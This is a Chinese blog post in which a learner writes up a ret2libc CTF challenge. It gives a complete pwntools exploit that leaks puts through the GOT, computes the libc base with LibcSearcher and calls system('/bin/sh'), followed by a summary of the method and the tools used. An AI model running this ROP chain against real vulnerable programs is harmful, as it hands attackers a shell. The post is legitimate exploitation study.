day6——ret2libc的终章

最新推荐文章于 2024-05-21 15:32:45 发布
最新推荐文章于 2024-05-21 15:32:45 发布
阅读量41 收藏
点赞数
分类专栏: 精华刷题集_pwn 文章标签: 学习 安全 网络安全 linux 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73858054/article/details/134763776
版权

day6

ret2libc

基本上可以了,这个类型的题目,最后再来一题

思路

在这里插入图片描述
在这里插入图片描述

没找到明显的提权函数,还是直接泄露一下got表

ROPgadget --binary pwn --only 'pop|ret'

在这里插入图片描述
进IDA里找一下要用到的的地址
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

利用ROPgadget(一种方便找gadgets片段的工具)找到向rdi寄存器赋值的rdi以及用来吃掉返回值的ret。然后找到puts函数的plt地址以及got地址,用来进行got表泄露。在找到main函数地址,用来重复执行main函数。

找齐之后就可以进行第一次泄露了

exp上半部分:

from pwn import *
from LibcSearcher import *
# sh = remote("node4.anna.nssctf.cn",28983)
sh = process('./pwn')

puts_plt = 0x400520
puts_got = 0x601018
pop_rdi_ret = 0x400763
pop_ret = 0x400509
main_addr = 0x4006D6

payload = b'a'*0x18 + p64(pop_ret) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr) + b'\x00'

sh.sendline(payload)

随后接受程序发来的got表后六位的地址信息,将该地址减去puts函数在libc中的相对基址的偏移,得到基址的绝对地址。

随后用基址的绝对地址加上system和str_bin_sh的相对偏移,得到其绝对地址,随后正常调用即可。

exp下半部分:

puts_addr = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

payload = b'a'*0x18 + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)

sh.sendline(payload)
sh.interactive()
反思

最后的最后,来说一下收获吧

这段时间对ret2libc的了解不断加深

首先,这类题目需要程序中加载有libc模块,并且没有对此进行限制,比如关闭输入输出流,让你没法进行got表泄露。其他的应该就没啥限制了吧,感觉这种方法的适用性挺大的(不要听我一个菜鸟胡说八道)。

下面来简单讲一下基本方法以及一些工具的使用

基本思路就是

  1. 找到可以用来输出的方法,把got表中的任意一个值泄露出来。
  2. 取得泄露的值,通过对比位置的方法找到对应libc版本,然后根据相对偏移量以及之前泄露的got来计算要用到函数在内存上的地址(绝对地址)。
  3. 利用得到地址编写攻击代码。

一般来说,要用的的工具都有ROPgadget,pwngdb,LibcSearcher。

当然,以上三个是我这段时间使用的工具,分别是用来进行查找gadgets片段、调试、以及对比查找libc库 的。

不足

讲一下我目前可以看到的自身的不足吧,我没见过开启PIE保护的这类题目,感觉这类题目应该会很不一样。有时间或者有机会一定要看一下。

进击的萝卜君
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
实验三——ret2libc3地址泄露
wwh的博客
04-22 1938
用【checksec】查看:不存在必要的保护 查看got表信息:【readelf -r ret2libc3】 所以我决定用泄露 __libc_strart_main 的地址,来判定libc的版本 这里插入代码 from pwn import * from LibcSearcher import * context.log_level='debug' context.terminal=['gn...
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
pwn ——ret2libc3
qq_41696518的博客
07-06 768
ret2libc3
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2139
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
pwn学习——ret2libc2
MrTreebook的博客
11-28 1004
pwn学习——ret2libc21.攻击原理2. ret2libc2的源代码3.checksec看一下保护4.exp 1.攻击原理 通过把函数返回地址直接指向系统库中的函数(如system函数),同时构造该函数的输入参数栈,就可以达到代码执行的目的。 正常堆栈布局: ret2libc执行system的堆栈布局: 本题和ret2libc1的区别就是程序中没有自带"/bin/sh",需要自己写进去 2. ret2libc2的源代码 #include <stdio.h> #include <
pwn学习——ret2libc1
MrTreebook的博客
11-28 1246
pwn学习——ret2libc11.看一下程序的保护2.看一下main函数有没有溢出3.ROPgadget4.exp 1.看一下程序的保护 ➜ ret2libc1 checksec ret2libc1 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 2.看一
【PWN · ret2libc】ret2libc2
Mr_Fmnwon的博客
05-08 502
经过ret2libc1的洗礼,我们对ret2libc的做题模范有了基本的范式,然而实际的题目远没有如此直白和简单。本题就遇到了一个问题:"/bin/sh"字符串在程序中并不存在,怎么办?其实很简单:没有我们就自己输入。因为具体的原理在ret2libc1中已经很详细地讲述了,所以本篇博客主要复现解题过程。从最基本理解原理的ret2libc1,到有点花头的ret2libc2,值得展望的是,比赛的题目,远远难于此。但千里之行始于足下,掌握好这些基础的,掌握好这些原理,才能慢慢深入进阶。
【PWN · ret2libc】[2021 鹤城杯]babyof
Mr_Fmnwon的博客
05-30 1613
64位Linux和32位Linux确乎有着关于参数传递上的不同,然而无论哪种,关于ret2libc这一题型。如果仅仅是wiki上的三道题目,那还是远远不够的。故尝试通过本题,总结ret2libc的一般过程。过程包括通过puts/write来泄露got表中的puts/write的真实地址->计算libc的基址->libc基址+任意库函数相对于libc的偏移量=任意函数真实地址->libc基址+libc中'/bin/sh'偏移量='/bin/sh'地址,如此构造system('/bin/sh')
栈溢出实例--笔记三(ret2libc
一只青木呀
08-07 1313
栈溢出实例--笔记三(ret2libc)1、栈溢出含义及栈结构2、ret2libc基本思路3、实战3.1、二进制程序如下3.2、查看栈结构3.3、第一次栈溢出3.4、第二次栈溢出 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 栈溢出实例–笔记二(ret2shellcode) 2、ret2libc基本思路 在当一个程序开启了NX(栈不可执行)的时候,我们没办法去写shellcode,而且程序中也没有system函数供我们调用的时候,那此时我们该如何做呢? 首先,程序本身没有system
linux中ret2libc入门与实践
counsellor的专栏
08-23 6736
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
Mailbox(getshell) writeup —— ret2libc的利用
格物致知
05-01 2679
Hint: ret2libc √ 题目描述: mailbox libc-2.19.so 题目目录下面还有另外一个flag文件:)需要拿到shell才能看得到 Writeup: ret2libc即为return-to-libc,返回到系统库函数执行。 数据执行保护机制(Data Execution Prevention)将非代码区段设置为不可执行属性,使得系统无法执行
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc exploit
07-07
exploit hack linux ret2libc
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
WEB转Flutter基础学习笔记(内含vue和flutter对比)
小易不止于搬砖的博客
05-17 881
笔者是一名web前端,记录在转栈flutter时的学习笔记,内涵和vue的对比,能够辅助前端同学更容易理解flutter
web安全学习笔记(18)
m0_58875569的博客
05-18 663
记一下第31-32节课的内容。未授权访问漏洞;逻辑漏洞之任意用户密码重置的7种常用姿势
引用实战学习
qiuzhiuser的博客
05-19 134
【代码】引用实战学习
JVM学习-执行引擎
最新发布
丢爸
05-21 734
当然是否需要启动JIT编译器将字节码直接编译为对应平台的本地机器指令,则需要根据代码被调用。大部分的程序代码转换为物理机的目标代码或虚拟机能执行的指令集之前,都需要经过下图各个步骤。,将其直接编译为对应平台的本地机器指令,以此提升Java程序的执行性能。”,JIT编译器在运行时会针对那些频繁被调用的热点代码做出。Java代码编译是由Java源码编译器来完成,流程图如下。而定,关于那些需要被编译为本地代码的字节码,称为“Java字节码的执行是由JVM执行引擎来完成。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值